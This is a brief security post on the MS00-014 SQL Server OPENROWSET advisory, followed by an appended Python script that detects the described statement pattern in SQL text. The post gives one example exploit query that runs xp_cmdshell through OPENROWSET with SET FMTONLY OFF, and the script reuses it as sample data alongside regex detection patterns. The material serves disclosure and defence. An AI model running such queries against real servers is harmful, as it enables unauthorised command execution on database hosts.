Due to the apparent blackout of information about the "SQL Query Abuse" advisory

http://www.microsoft.com/technet/security/bulletin/ms00-014.asp

I wanted to point any interested parties to an English description of the vulnerability by Sven Hammesfahr. The detailed description is on his website at

http://itrain.de/sql/knowhow/security/openrowsete.htm

Also, the "little trick" he refers to is in my opinion the addition of SET FMTONLY OFF before the execute statement to keep the query from returning metadata only. An example exploit would be:

SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver','SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')

Test your servers ASAP to keep from becoming a statistic...

-----------------------------------------
Chip Andrews, MCSE+I, MCSD
http://www.sqlsecurity.com
http://www.eexams.com
------------------------------------------
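One way to look for the statement shape described in the post above in captured SQL text, as an added example that is not part of the original message: it extracts the pass-through query from each ad hoc OPENROWSET call and flags SET FMTONLY OFF, EXEC/EXECUTE and trusted connections. The function name, flag names and sample statements are assumptions made for illustration; the first sample is the statement quoted in the post and the others are constructed.

```python
import re

LIT = r"'((?:[^']|'')*)'"      # T-SQL string literal; '' is an escaped quote
LIT_NC = r"'(?:[^']|'')*'"     # same literal, non-capturing
# OPENROWSET('provider', 'connstr' or 'datasource';'user';'password', 'query')
OPENROWSET = re.compile(
    r"OPENROWSET\s*\(\s*" + LIT + r"\s*,\s*" + LIT
    + r"(?:\s*;\s*" + LIT_NC + r"){0,2}\s*,\s*" + LIT + r"\s*\)",
    re.IGNORECASE)
# Checks applied to the inner (pass-through) query only.
CHECKS = [
    ("fmtonly_off", re.compile(r"\bSET\s+FMTONLY\s+OFF\b", re.I)),
    ("exec", re.compile(r"\bEXEC(?:UTE)?\b", re.I)),
]
TRUSTED = re.compile(r"Trusted_Connection\s*=\s*Yes", re.I)

def audit_statement(sql):
    """Return one finding per ad hoc OPENROWSET call found in `sql`."""
    findings = []
    for m in OPENROWSET.finditer(sql):
        provider, conn, query = (g.replace("''", "'") for g in m.groups())
        flags = [name for name, rx in CHECKS if rx.search(query)]
        if TRUSTED.search(conn):
            flags.append("trusted_connection")
        findings.append({"provider": provider, "query": query, "flags": flags})
    return findings

# Sample statements: [0] is quoted from the post, [1] and [2] are constructed.
SAMPLES = [
    "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;"
    "Data Source=myserver','SET FMTONLY OFF execute master..xp_cmdshell "
    "\"dir c:\\\"')",
    "SELECT a.* FROM OPENROWSET('SQLOLEDB','reportsrv';'report_ro';"
    "'constructed-password','SELECT au_lname FROM pubs.dbo.authors') AS a",
    "SELECT au_lname FROM pubs.dbo.authors WHERE state = 'CA'",
]

if __name__ == "__main__":
    for sql in SAMPLES:
        for f in audit_statement(sql):
            level = "ALERT" if f["flags"] else "review"
            print(level, f["provider"], f["flags"], f["query"])
```

Every OPENROWSET call is reported so that plain ad hoc queries can still be reviewed; an empty flag list means none of the three patterns was present.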
